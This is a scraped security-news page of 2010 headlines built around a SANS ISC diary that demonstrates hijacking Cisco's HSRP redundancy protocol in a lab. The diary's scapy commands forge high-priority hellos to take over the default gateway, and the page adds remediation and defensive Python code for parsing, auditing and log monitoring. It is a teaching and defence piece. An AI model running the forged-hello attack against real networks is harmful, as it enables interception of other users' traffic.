InfoSec News

The lead developer of the OpenBSD operating system says that he believes that a government contracting firm that contributed code to his project "was probably contracted to write backdoors," which would grant secret access to encrypted communications.
 
Linux Kernel Futex Macros Local Denial of Service Vulnerability
 
EMC this week announced it had completed its tender offer to purchase clustered NAS vendor Isilon Systems for about $2.16 billion.
 
An in-depth look at the considerations for evaluating client virtualization solutions
 
As the role of Active Directory evolves and becomes a central component of your infrastructure, consider the following steps to improve your security posture and your ability to facilitate productive business.
 
Over the past five years, many organizations have migrated from Lotus Notes/Domino to the Microsoft platform, but have hesitated to tackle the most difficult part of the transition: migrating applications to SharePoint.
 
Some aspects of the ERP software landscape, such as tired legacy code-bases and disastrous implementation projects, may never go away. But in recent years, the pace of change with ERP has accelerated, and all signs are that will continue in 2011.
 
Fredrick Foster, vice president with Andrews International, is an authority on recognition and response to potential violence.
 
Samsung is now shipping SSDs aimed at enterprise-class storage systems. The new drives use consumer-type flash memory that helps lower their overall cost.
 
The FCC's decision to create new Net neutrality rules gets a mixed reaction.
 
Today, service providers and enterprises interested in implementing clouds face the challenge of integrating complex software and hardware components from multiple vendors. The resulting system can end up being expensive to build and hard to operate, minimizing the original motives and benefits of moving to cloud computing. Cloud computing platforms are attractive because they let businesses quickly access hosted private and public resources on-demand without the complexities and time associated with the purchase, installation, configuration and deployment of traditional physical infrastructure.
 
Git gitweb 'index.php' Multiple Cross Site Scripting Vulnerabilities
 
'mod_auth_mysql' Package Multibyte Character Encoding SQL Injection Vulnerability
 
Microsoft today said makers of phones running its new Windows mobile operating system had sold 1.5 million handsets since the October launch of Windows Phone 7 (WP7).
 
Reader Daniel is looking for ways to speed up his aging laptop, which he says is "slowly deteriorating" but needs to last another year or two.
 
The best CRM applications are really toolkits in disguise. When do you need to be focusing on buying "just an app," and when do you need to focus on the toolkit and platform?
 
Pete Lindstrom, a research director at Spire Security joins the editorial team to talk about the top IT security news stories of 2010.

 
Apple has pulled an iPhone app from the App Store that let users read secret U.S. diplomatic cables published by WikiLeaks and follow the controversial organization's Twitter feed.
 
Citrix Access Gateway User Credentials Command Injection Vulnerability
 
PR10-14 Unauthenticated command execution within Mitel's AWC (Mitel Audio and Web Conferencing)
 
The FCC today voted to implement compromise Net neutrality rules prohibiting broadband providers from blocking customer access to legal Web content. Critics say the rules are too weak.
 
The new site is for testing early Web standard technologies
 
The New York Times cobbled together a Ruby application to run on Amazon to report on live election results. Cost: a few hundred bucks.
 
Can we talk? Based on the e-mail I get every day, I know a lot of you are still using Windows XP. I can understand why; it's like a comfortable old shoe. Plus, it's bought and paid for. Windows 7 probably seems stiff and scary, and it's not like Microsoft is handing out free upgrades.
 
www.eVuln.com : Authentication Bypass by SQL Injection in Social Share
 
XSS vulnerability in ImpressCMS
 
Path disclosure in HTML-EDIT CMS
 
Microsoft Internet Explorer Uninitialized Object CVE-2010-3343 Memory Corruption Vulnerability
 
[security bulletin] HPSBST02619 SSRT100281 rev.1 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code
 
Three SAP vice presidents and a head of services are leaving the company, as part of a major management reshuffle, it is understood.
 
The Cloud Security Alliance's matrix is a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains.
 
XSS vulnerability in Habari
 
Path disclosure in Habari
 
SQL Injection in HTML-EDIT CMS
 
XSS vulnerability in Habari
 
Solid-state storage has helped to raise the wave of portable PC alternatives that has hit the market over the past few years, and 2011 is likely to see that technology become more affordable and better performing.
 
PrestaShop 1.3.3 Multiple Cross-Site Scripting Vulnerabilities
 
Habari Multiple Cross-Site Scripting Vulnerabilities
 
So I started this series on Network Reliability Mechanisms back in September ( http://isc.sans.edu/diary.html?storyid=9583 ), and with work and life and the rest, I realized that I've let the promised installments in this series slide a bit.



In today's diary we'll explore and compromise HSRP - Cisco's Hot Standby Routing Protocol. Why would you want to do this, you ask? You may remember some of our previous diaries on ARP Poisoning Man in the Middle attacks (for instance, this one: http://isc.sans.edu/diary.html?storyid=7303 ), and protections against them ( http://isc.sans.edu/diary.html?storyid=7567 ). Hijacking a redundancy protocol like HSRP allows you to bypass all of these layer 2 protections by simply participating in the (legitimate) HSRP exchange.
The Basics


In HSRP, the primary and backup routers retain their own interface IP addresses, and the virtual IP is homed on whichever router is primary at any given time. HSRP is usually implemented to make the default gateway more reliable, so if you preempt the HSRP process on a subnet, in most cases all of the packets leaving the subnet will now transit your (attacking) host.



Basic HSRP Configuration



Let's start with a test network, shown here. We'll make R2 the primary HSRP router, and R1 the backup router. Our host Attacker1 will attack the process.


To configure the backup router, we'll update the interface configuration:



On Router R1:

interface FastEthernet1/0
 ip address 192.168.206.252 255.255.255.0
 standby 1 priority 90
 standby 1 ip 192.168.206.254

On Router R2:

interface FastEthernet1/0
 ip address 192.168.206.253 255.255.255.0
 standby 1 ip 192.168.206.254
 standby 1 preempt




When you display the HSRP status on R2, we'll see that HSRP maintains a virtual MAC address separate from the physical interface, as well as a number of other useful variables (we'll use these later).



R2#sho stand
FastEthernet1/0 - Group 1
  State is Active
    5 state changes, last state change 00:00:22
  Virtual IP address is 192.168.206.254
  Active virtual MAC address is 0000.0c07.ac01
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
    Next hello sent in 1.448 secs
  Preemption enabled
  Active router is local
  Standby router is 192.168.206.253, priority 90 (expires in 9.460 sec)
  Priority 100 (default 100)
  IP redundancy name is hsrp-Fa1/0-1 (default)


Compromising the Protocol (Time for some fun !):



We'll use the general purpose packet manipulation tool scapy to mount the attack. There are a number of tools that can be used for this, among them yersinia and loki. Or, since the packets are simple enough, you can craft them yourself using Python or Perl. I chose to use scapy this time around, as I've heard great things about the tool, I hadn't used it previously, and I figured it was time.



Let's start by looking at a normal packet exchange from a regular peering relationship (between R1 and R2). First a packet from R2, the primary.

And a packet from R1, the backup.


Note that everything is in clear text, my favourite two words !!
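Since the two capture images did not survive, here is an added example (it is not part of the original diary, nor code from the scapy project) that decodes what those captures contain: a small dissector for the 20-byte HSRP version 1 header defined in RFC 2281, plus an audit that compares each decoded hello against the group's expected configuration. The three sample payloads are constructed for this example using the addresses and priorities from the diary; the EXPECTED table, the finding wording and the "trailer" handling are assumptions of this example.

```python
import struct

# HSRP version 1 fixed header (RFC 2281, section 5.1): 20 bytes carried in a
# UDP datagram from port 1985 to port 1985, multicast to 224.0.0.2.
HSRP_V1_FMT = "!BBBBBBBB8s4s"
HSRP_V1_LEN = struct.calcsize(HSRP_V1_FMT)  # 20
OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}
DEFAULT_AUTH = b"cisco"  # the RFC default clear-text authentication string


def parse_hsrp_v1(payload: bytes) -> dict:
    """Decode the fixed HSRP v1 header from a UDP payload.

    Bytes beyond the header are returned untouched as 'trailer'; IOS places its
    MD5 authentication data there when it is configured (not validated here).
    """
    if len(payload) < HSRP_V1_LEN:
        raise ValueError(f"HSRP payload too short: {len(payload)} bytes")
    (version, opcode, state, hellotime, holdtime, priority,
     group, _reserved, auth, vip) = struct.unpack(HSRP_V1_FMT, payload[:HSRP_V1_LEN])
    return {
        "version": version,
        "opcode": OPCODES.get(opcode, f"unknown({opcode})"),
        "state": STATES.get(state, f"unknown({state})"),
        "hellotime": hellotime,
        "holdtime": holdtime,
        "priority": priority,
        "group": group,
        "auth": auth.rstrip(b"\x00"),  # the field is zero-padded to 8 bytes
        "virtual_ip": ".".join(str(b) for b in vip),
        "trailer": payload[HSRP_V1_LEN:],
    }


def audit_hsrp(src_ip: str, payload: bytes, expected: dict) -> list:
    """Compare one hello with the known group configuration and return a list
    of findings (an empty list means nothing unexpected)."""
    pkt = parse_hsrp_v1(payload)
    findings = []
    if src_ip not in expected["routers"]:
        findings.append(f"hello from unknown router {src_ip}")
    if pkt["group"] != expected["group"]:
        findings.append(f"group {pkt['group']} differs from expected {expected['group']}")
    if pkt["virtual_ip"] != expected["virtual_ip"]:
        findings.append(f"virtual IP {pkt['virtual_ip']} differs from expected {expected['virtual_ip']}")
    if pkt["priority"] > expected["max_priority"]:
        findings.append(f"priority {pkt['priority']} exceeds the configured maximum {expected['max_priority']}")
    if pkt["auth"] == DEFAULT_AUTH and not pkt["trailer"]:
        findings.append("default clear-text authentication 'cisco' and no MD5 data")
    return findings


# Expected group state, taken from the diary's R1/R2 configuration.
EXPECTED = {
    "routers": {"192.168.206.252", "192.168.206.253"},
    "group": 1,
    "virtual_ip": "192.168.206.254",
    "max_priority": 100,  # R2 uses the default 100, R1 is configured with 90
}

# Constructed sample payloads (not captures from the diary), keyed by source IP:
# version 0, opcode Hello, state, hello 3 s, hold 10 s, priority, group 1,
# reserved, "cisco" padded to 8 bytes, virtual IP 192.168.206.254.
SAMPLES = {
    "192.168.206.253": bytes.fromhex("00 00 10 03 0a 64 01 00 63 69 73 63 6f 00 00 00 c0 a8 ce fe"),  # R2: Active, prio 100
    "192.168.206.252": bytes.fromhex("00 00 08 03 0a 5a 01 00 63 69 73 63 6f 00 00 00 c0 a8 ce fe"),  # R1: Standby, prio 90
    "192.168.206.132": bytes.fromhex("00 00 10 03 0a e6 01 00 63 69 73 63 6f 00 00 00 c0 a8 ce fe"),  # unknown host, prio 230
}


def audit_samples() -> dict:
    """Run the audit over every sample; returns {source IP: [findings]}."""
    return {src: audit_hsrp(src, payload, EXPECTED) for src, payload in SAMPLES.items()}


if __name__ == "__main__":
    for src, payload in SAMPLES.items():
        pkt = parse_hsrp_v1(payload)
        print(f"{src}: {pkt['opcode']} state={pkt['state']} prio={pkt['priority']} "
              f"auth={pkt['auth']!r} vip={pkt['virtual_ip']}")
        for finding in audit_hsrp(src, payload, EXPECTED):
            print("   !", finding)
```

Every field the audit reads (priority, group, virtual IP, the authentication string) sits in the clear in the first 20 bytes, which is the point of the diary's remark above; the same dissector can be pointed at a live UDP/1985 feed from a span port to watch for hellos from addresses that are not the two configured routers.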

Let's mount the attack, using scapy. Scapy is written in Python, and can be installed on many OS platforms - Windows, Linux and OS X to name the top 3 - we'll use a Linux install today.
We'll see some parameters here that look familiar (going back to the sho standby output). You can see the full parameter list for HSRP available in scapy by viewing the file scapy/layers/hsrp.py. This "check the source code" method is a really nice feature of scapy !




[email protected]:~$ sudo scapy
Welcome to Scapy (2.0.1)

We need root access to craft, send and capture packets in Linux, so we'll use sudo to get that.

ip = IP(src='192.168.206.132', dst='224.0.0.2')

Set up the IP parameters - we'll source the attack from the eth0 IP address, and send to the HSRP multicast address, 224.0.0.2 (the same as in the packet captures above).

udp = UDP()

HSRP is a UDP protocol.

hsrp = HSRP(group=1, priority=230, virtualIP='192.168.206.254')

We'll be participating in HSRP Group 1, we'll set the priority for the attacking host at 230, and set the virtual IP address to the default gateway. Note that all of the attack parameters are freely available in every HSRP packet sent by the legitimate participants.

send(ip/udp/hsrp, iface='eth0', inter=3, loop=1)

Now we'll send the attack from the eth0 interface, every 3 seconds. The loop=1 parameter indicates that the attack is mounted until the process is stopped manually.




Once the attack starts, we'll see packets on the wire from the attacker:

On R2 we'll see the primary router go to a standby state:

%HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Active - Speak

%HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Speak - Standby



R2#sho stand
FastEthernet1/0 - Group 1
  State is Standby
    4 state changes, last state change 00:00:45
  Virtual IP address is 192.168.206.254
  Active virtual MAC address is 000c.29d0.fcb4
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
    Next hello sent in 2.860 secs
  Preemption disabled
  Active router is 192.168.206.132, priority 230 (expires in 8.792 sec)
  Standby router is local
  Priority 100 (default 100)
  IP redundancy name is hsrp-Fa1/0-1 (default)
R1 similarly transitions to Listen mode and stays there, as there can only be one active and one standby router.

R1

*Mar 1 00:05:19.475: %HSRP-5-STATECHANGE: FastEthernet1/0 Grp 1 state Standby - Listen

R1#sho stand
FastEthernet1/0 - Group 1
  State is Listen
    2 state changes, last state change 00:00:42
  Virtual IP address is 192.168.206.254
  Active virtual MAC address is 000c.29d0.fcb4
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
  Preemption enabled
  Active router is 192.168.206.132, priority 230 (expires in 7.800 sec)
  Standby router is 192.168.206.252, priority 100 (expires in 8.820 sec)
  Priority 90 (configured 90)
  IP redundancy name is hsrp-Fa1/0-1 (default)
At this point, the HSRP primary is the attacking Linux host. If HSRP is implemented to represent the default gateway on this subnet, all packets leaving the subnet now go to this host, which can capture or modify them at will before forwarding them on to their final destination. Note that you'll want to set this final routing up correctly if you plan to use this method in a penetration test !!

Remediation - How Can We Fix This ?
In a word, authentication. We need to authenticate each host in the HSRP relationship, so that unauthorized attackers are simply ignored - or better yet, their packets should be dropped and logged.
In HSRP, we do this with hashing, specifically MD5 hashing keyed with a shared secret. This is simply done in the configuration - an updated R2 configuration is below. Be sure to use a better key string than the secretstring shown in the example - I generally use an Excel sheet to generate strings like this (a string of random characters, with no zeros, o's, ones or l's - you get the idea).


interface FastEthernet1/0
 ip address 192.168.206.252 255.255.255.0
 duplex auto
 speed auto
 standby 1 ip 192.168.206.254
 standby 1 preempt
 standby 1 authentication md5 key-string secretstring



R2#sho stand
FastEthernet1/0 - Group 1
  State is Active
    8 state changes, last state change 00:00:11
  Virtual IP address is 192.168.206.254
  Active virtual MAC address is 0000.0c07.ac01
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
    Next hello sent in 0.728 secs
  Authentication MD5, key-string secretstring
  Preemption enabled
  Active router is local
  Standby router is 192.168.206.253, priority 90 (expires in 8.760 sec)
  Priority 100 (default 100)
  IP redundancy name is hsrp-Fa1/0-1 (default)
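The two remediation points above (every HSRP group needs MD5 authentication, and the key string should be long and random) are easy to check across a set of saved configurations. The following is an added example, not code from the diary or from Cisco: it walks an IOS configuration, reports each HSRP group with no authentication, clear-text authentication or a short key-string, and generates key strings from the diary's alphabet (no 0/O/o or 1/l/I). MIN_KEY_LENGTH is an assumption of this example; the diary sets no minimum. The sample configurations are modelled on the diary's R1 and R2, with a constructed hardened variant.

```python
import re
import secrets

# Characters allowed in a generated key string: letters and digits minus the
# easily confused ones the diary excludes (0/O/o and 1/l/I).
KEY_ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz23456789"
MIN_KEY_LENGTH = 16  # assumption of this example; the diary sets no minimum

STANDBY_LINE = re.compile(r"^standby (?P<group>\d+) (?P<keyword>\S+)(?: (?P<rest>.*))?$")


def make_key_string(length: int = 24) -> str:
    """Generate a random key string from KEY_ALPHABET using the secrets module."""
    return "".join(secrets.choice(KEY_ALPHABET) for _ in range(length))


def audit_hsrp_config(config: str) -> list:
    """Return one finding per HSRP group in an IOS configuration that has no
    authentication, clear-text authentication, or a short MD5 key-string."""
    groups = {}  # (interface, group) -> {"ip": bool, "auth": str, "key": str|None}
    iface = None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("interface "):
            iface = line.split(None, 1)[1]
            continue
        m = STANDBY_LINE.match(line)
        if not m or iface is None:
            continue
        entry = groups.setdefault((iface, m["group"]), {"ip": False, "auth": "none", "key": None})
        tokens = (m["rest"] or "").split()
        if m["keyword"] == "ip":
            entry["ip"] = True
        elif m["keyword"] == "authentication":
            if tokens and tokens[0] == "md5":
                entry["auth"] = "md5"
                # "md5 key-string [0|7] <key> [timeout]": type 7 keys are stored
                # obfuscated, so their length cannot be judged from the config.
                if len(tokens) >= 3 and tokens[1] == "key-string":
                    if tokens[2] == "0" and len(tokens) >= 4:
                        entry["key"] = tokens[3]
                    elif tokens[2] != "7":
                        entry["key"] = tokens[2]
            else:
                entry["auth"] = "text"  # "standby N authentication <string>" is sent in the clear
    findings = []
    for (iface, group), entry in sorted(groups.items()):
        if not entry["ip"]:
            continue  # not an HSRP group, just stray standby commands
        where = f"{iface} group {group}"
        if entry["auth"] == "none":
            findings.append(f"{where}: no authentication configured")
        elif entry["auth"] == "text":
            findings.append(f"{where}: clear-text authentication offers no protection")
        elif entry["key"] is not None and len(entry["key"]) < MIN_KEY_LENGTH:
            findings.append(f"{where}: MD5 key-string is only {len(entry['key'])} characters")
    return findings


# Sample configurations modelled on the diary's routers (the hardened one is constructed).
R1_CONFIG = """\
interface FastEthernet1/0
 ip address 192.168.206.252 255.255.255.0
 standby 1 priority 90
 standby 1 ip 192.168.206.254
"""

R2_CONFIG_MD5 = """\
interface FastEthernet1/0
 ip address 192.168.206.253 255.255.255.0
 standby 1 ip 192.168.206.254
 standby 1 preempt
 standby 1 authentication md5 key-string secretstring
"""


def hardened_config(key: str) -> str:
    """R2's configuration with a generated key-string in place of 'secretstring'."""
    return R2_CONFIG_MD5.replace("secretstring", key)


if __name__ == "__main__":
    key = make_key_string()
    for name, cfg in [("R1", R1_CONFIG), ("R2 (secretstring)", R2_CONFIG_MD5), ("R2 (hardened)", hardened_config(key))]:
        print(name, "->", audit_hsrp_config(cfg) or ["ok"])
```

The same key must be configured on both routers, or the peer will start logging %HSRP-4-BADAUTH for legitimate hellos; the audit above only checks one configuration at a time, so compare the key-strings of both members of a pair as a separate step.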
In the packet captured below, you'll see that the plaintext in the HSRP packet is now scrambled. Part of the payload is now MD5 hashed using the key-string.

If an attacker mounts the attack we've shown here, the authentication will fail and you'll see this message:

*Mar 1 02:11:14.650: %HSRP-4-BADAUTH: Bad authentication from 192.168.206.133, group 1, remote state Speak
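The %HSRP-5-STATECHANGE lines shown when the attack took effect and the %HSRP-4-BADAUTH line above are exactly what a log monitor should alert on. The following is an added example, not part of the diary: it parses those two IOS message formats from syslog lines, rates each event (an Active router dropping out of the Active state, a Standby router pushed down to Listen, or a rejected authentication is worth a page; Speak to Standby is routine) and counts alerts by severity. The sample log is constructed from the messages quoted in the diary with invented timestamps; the severity scheme and the router-to-log pairing are assumptions of this example.

```python
import re
from collections import Counter
from typing import Optional

# IOS message formats quoted in the diary. The leading timestamp is the usual
# "*Mon dd hh:mm:ss.mmm:" form and is only used for reporting.
STATECHANGE = re.compile(
    r"%HSRP-5-STATECHANGE: (?P<iface>\S+) Grp (?P<group>\d+) state (?P<old>\w+) - (?P<new>\w+)")
BADAUTH = re.compile(
    r"%HSRP-4-BADAUTH: Bad authentication from (?P<src>[\d.]+), group (?P<group>\d+), remote state (?P<state>\w+)")
TIMESTAMP = re.compile(r"^\*?(?P<ts>[A-Za-z]{3}\s+\d+\s+\d\d:\d\d:\d\d(?:\.\d+)?):")


def classify(router: str, line: str) -> Optional[dict]:
    """Turn one syslog line into an alert dict, or None if it is not an HSRP event."""
    ts_match = TIMESTAMP.match(line)
    ts = ts_match.group("ts") if ts_match else "?"
    m = BADAUTH.search(line)
    if m:
        return {"ts": ts, "router": router, "severity": "high",
                "reason": (f"HSRP packet rejected from {m['src']} for group {m['group']}: "
                           "a participant is sending without the shared key")}
    m = STATECHANGE.search(line)
    if not m:
        return None
    old, new = m["old"], m["new"]
    where = f"{m['iface']} group {m['group']}"
    if old == "Active":
        severity = "high"
        reason = f"{router} lost the Active role on {where} ({old} -> {new}); a higher-priority peer appeared"
    elif old == "Standby" and new == "Listen":
        severity = "medium"
        reason = f"{router} was pushed out of Standby on {where}; a third participant outranks it"
    elif new == "Active":
        severity = "medium"
        reason = f"{router} became Active on {where}; expected only at boot or during a planned failover"
    else:
        severity = "info"
        reason = f"{router}: {where} {old} -> {new}"
    return {"ts": ts, "router": router, "severity": severity, "reason": reason}


def scan(entries) -> list:
    """entries: iterable of (router name, syslog line) pairs. Returns every HSRP alert."""
    alerts = []
    for router, line in entries:
        alert = classify(router, line)
        if alert:
            alerts.append(alert)
    return alerts


def severity_counts(alerts) -> Counter:
    """Number of alerts per severity level."""
    return Counter(a["severity"] for a in alerts)


# Constructed sample log (modelled on the messages quoted in the diary, with
# invented timestamps), as (router, line) pairs.
SAMPLE_LOG = [
    ("R2", "*Mar  1 00:05:19.471: %HSRP-5-STATECHANGE: FastEthernet1/0 Grp 1 state Active - Speak"),
    ("R2", "*Mar  1 00:05:19.472: %HSRP-5-STATECHANGE: FastEthernet1/0 Grp 1 state Speak - Standby"),
    ("R1", "*Mar  1 00:05:19.475: %HSRP-5-STATECHANGE: FastEthernet1/0 Grp 1 state Standby - Listen"),
    ("R1", "*Mar  1 00:05:20.001: %LINK-3-UPDOWN: Interface FastEthernet1/0, changed state to up"),
    ("R2", "*Mar  1 02:11:14.650: %HSRP-4-BADAUTH: Bad authentication from 192.168.206.133, group 1, remote state Speak"),
]

if __name__ == "__main__":
    alerts = scan(SAMPLE_LOG)
    for a in alerts:
        print(f"[{a['severity']:6}] {a['ts']} {a['reason']}")
    print(dict(severity_counts(alerts)))
```

An Active to Speak transition on the router that is supposed to own the virtual IP, with no matching change on its configured peer, is the signature of the takeover shown earlier in this diary; once MD5 authentication is in place the same event shows up as %HSRP-4-BADAUTH instead, which is why both formats are handled together.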


Often we'll also see access lists used to limit inbound HSRP traffic. This method is subject to ARP poisoning, so it is more useful for controlling inbound HSRP when there are multiple HSRP router pairs on the same network.



ip access-list extended ACL_HSRP_INBOUND
 permit udp host 192.168.206.252 eq 1985 any eq 1985
 deny udp any eq 1985 any eq 1985 log
 permit ip any any


Another way to get this done is to set up an IPsec tunnel between the two HSRP participants, and direct all of the HSRP packets through this tunnel.



ip access-list extended ACL_IPSEC_FOR_HSRP
 permit udp any eq 1985 host 224.0.0.2 eq 1985


A final method of fixing HSRP is to implement VRRP, which has AH (Authentication Header) built into the protocol. Note that as a pentester, I see MD5 on HSRP much more often than I see AH implemented on VRRP. I attribute this to vendor documentation - Cisco discusses simple MD5 authentication in almost all of their HSRP documentation, and AH is not often so prominent in vendor documentation, maybe because it is deemed overly complex.
Stick around for our next installment in this series !
And as always, if you have any comments on this discussion of HSRP or of the use of the scapy tool, please use our comment form.
=============== Rob VandenBrink Metafore =============== (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Failure to Enact Major Infosec Bill Foreseen
GovInfoSecurity.com (blog)
With help from some very astute Capitol observers and actors, readers of this blog shouldn't have been surprised that Congress failed to pass a significant, ...

 
Microsoft has pulled a non-security update to Outlook 2007 after customers complained of connection and performance issues when the automatic update was applied to company machines.

 
Sybase Afaria Cross Site Request Forgery Vulnerability
 
MHonArc HTML Mail Conversion Cross Site Scripting Vulnerability
 
Hycus CMS Multiple Input Validation Vulnerabilities
 
Diversity is key in Duke University's MBA-Cross-Continent program, which brings together students from around the world and sends them to several continents to learn. But when it comes to tools for linking the students and faculty in that program, a unified platform from Cisco Systems has brought several advantages.
 
Microsoft Office FlashPix Image Converter (CVE-2010-3952) Multiple Buffer Overflow Vulnerabilities
 
HP StorageWorks Storage Mirroring (CVE-2010-4116) Unspecified Remote Code Execution Vulnerability
 
Apple's move to stop offering applications from its Mac OS X download site the same day it opens the Mac App Store could leave some developers out in the cold.
 
Gmail users in the U.S can continue to call phones in North America and Canada for free after the new year, Google said in a blog post on Monday.
 
Microsoft's Windows PowerShell is, well, powerful, but also a bit peculiar. Here's what you need to know to get started with this robust command and scripting environment.
 
Microsoft Office FlashPix Image Converter (CVE-2010-3951) Buffer Overflow Vulnerability
 

Mobile security can dominate 2011: Narus
CIOL
The top three control procedures are expert security personnel, specialized training, collaboration in InfoSec community and policies and procedures. ...

 
The recession may have accelerated companies extending the lifecycles of PCs, laptops and servers, but that change may become permanent.
 
S9Y Serendipity 'manager.php' Arbitrary File Upload Vulnerability
 
Apple Mobile Safari 'decodeURIComponent' Remote Denial of Service Vulnerability
 
Openfiler 'device' Parameter Cross Site Scripting Vulnerability
 
FreeNAS 'index.php' Multiple Cross Site Scripting Vulnerabilities
 
InfoSec News: University Of Wisconsin-Madison Leaves 60, 000 SSNs Unprotected For Two Years: http://www.darkreading.com/database-security/167901020/security/attacks-breaches/228800912/university-of-wisconsin-madison-leaves-60-000-ssns-unprotected-for-two-years.html
By Kelly Jackson Higgins Darkreading Dec 20, 2010
A recent database breach that potentially exposed the Social Security [...]
 
InfoSec News: Hackers hit New York tour firm, access 110,00 bank cards: http://www.computerworld.com/s/article/9201822/Hackers_hit_New_York_tour_firm_access_110_00_bank_cards
By Robert McMillan IDG News Service December 20, 2010
Hackers have broken into the website of the New York tour company CitySights NY and stolen about 110,000 bank card numbers. [...]
 
InfoSec News: Call for Papers: Cyber Security in International Relations: Forwarded from: Brent Kesler <bdkesler (at) nps.edu>
Call for Papers: Cyber Security in International Relations Submissions due: February 1, 2011
Strategic Insights, an online journal published by the Center on Contemporary Conflict at the Naval Postgraduate School, is seeking [...]
 
InfoSec News: SAS man to take charge of cyber-warfare defences: http://www.independent.co.uk/news/media/online/sas-man-to-take-charge-of-cyberwarfare-defences-2164842.html
By Kim Sengupta independent.co.uk 20 December 20
A former chief of the SAS has been appointed to head the military's cyber-warfare operations amid rising concern about the risk of attacks [...]
 
InfoSec News: [Dataloss Weekly Summary] Week of Sunday, December 12, 2010: ========================================================================
Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, December 12, 2010
4 Incidents Added.
======================================================================== [...]
 
InfoSec News: OpenBSD back door claim now in doubt: http://news.techworld.com/security/3253839/openbsd-back-door-claim-now-in-doubt/
By John E Dunn Techworld 16 December 10
The claim that the FBI planted a backdoor in OpenBSD a decade ago has been flatly denied by developer protagonists named as having been [...]
 
InfoSec News: Gawker tech boss admits site security was crap: http://www.theregister.co.uk/2010/12/18/gawker_hack_aftermath/
By Dan Goodin in San Francisco The Register 18th December 2010
Gawker Media plans to overhaul its web infrastructure and require employees to use two-factor authentication when accessing sensitive [...]
 
InfoSec News: You've Been Breached: Now What?: http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=228800744
By Adam Ely InformationWeek December 18, 2010
No one likes to think about database breaches, but the fact is, they happen. Rather than cross your fingers and hope for the best, create an [...]
 

Posted by InfoSec News on Dec 20

Forwarded from: Brent Kesler <bdkesler (at) nps.edu>

Call for Papers: Cyber Security in International Relations
Submissions due: February 1, 2011

Strategic Insights, an online journal published by the Center on
Contemporary Conflict at the Naval Postgraduate School, is seeking
scholarly papers on the role that cyber security and information and
communications technology (ICT) play in international relations and the
strategic thinking...
 

Posted by InfoSec News on Dec 20

http://www.independent.co.uk/news/media/online/sas-man-to-take-charge-of-cyberwarfare-defences-2164842.html

By Kim Sengupta
independent.co.uk
20 December 20

A former chief of the SAS has been appointed to head the military's
cyber-warfare operations amid rising concern about the risk of attacks
on official websites endangering Britain's defences.

Major General Jonathan Shaw will lead a unit combating internet assaults
on vital strategic...
 

Posted by InfoSec News on Dec 20

========================================================================

Open Security Foundation - DataLossDB Weekly Summary
Week of Sunday, December 12, 2010

4 Incidents Added.

========================================================================

DataLossDB is a research project aimed at documenting known and reported
data loss incidents world-wide. The Open Security Foundation asks for
contributions of new incidents and new data for...
 

Posted by InfoSec News on Dec 20

http://news.techworld.com/security/3253839/openbsd-back-door-claim-now-in-doubt/

By John E Dunn
Techworld
16 December 10

The claim that the FBI planted a backdoor in OpenBSD a decade ago has
been flatly denied by developer protagonists named as having been
involved in the conspiracy in an email sent to OpenBSD founder, Theo de
Raadt.

Sent by former NETSEC CEO and contractor Gregory Perry, the contentious
email named senior OpenBSD...
 

Posted by InfoSec News on Dec 20

http://www.theregister.co.uk/2010/12/18/gawker_hack_aftermath/

By Dan Goodin in San Francisco
The Register
18th December 2010

Gawker Media plans to overhaul its web infrastructure and require
employees to use two-factor authentication when accessing sensitive
documents stored online, following an embarrassing attack that
completely rooted the publisher's servers.

The publisher of Gawker, Gizmodo, and seven other popular websites also...
 

Posted by InfoSec News on Dec 20

http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=228800744

By Adam Ely
InformationWeek
December 18, 2010

No one likes to think about database breaches, but the fact is, they
happen. Rather than cross your fingers and hope for the best, create an
incident response plan ahead of time. Without a plan, you may destroy
critical evidence that could be used to prosecute the offender. You
might also overlook just...
 

Posted by InfoSec News on Dec 20

http://www.darkreading.com/database-security/167901020/security/attacks-breaches/228800912/university-of-wisconsin-madison-leaves-60-000-ssns-unprotected-for-two-years.html

By Kelly Jackson Higgins
Darkreading
Dec 20, 2010

A recent database breach that potentially exposed the Social Security
Numbers of 60,000 former students and staff at the University of
Wisconsin is bringing attention to the way higher education institutions
store and...
 

Posted by InfoSec News on Dec 20

http://www.computerworld.com/s/article/9201822/Hackers_hit_New_York_tour_firm_access_110_00_bank_cards

By Robert McMillan
IDG News Service
December 20, 2010

Hackers have broken into the website of the New York tour company
CitySights NY and stolen about 110,000 bank card numbers.

They broke in using a SQL Injection attack on the company's Web server,
CitySights NY said in a Dec. 9 breach notification letter published by
New Hampshire's...
 

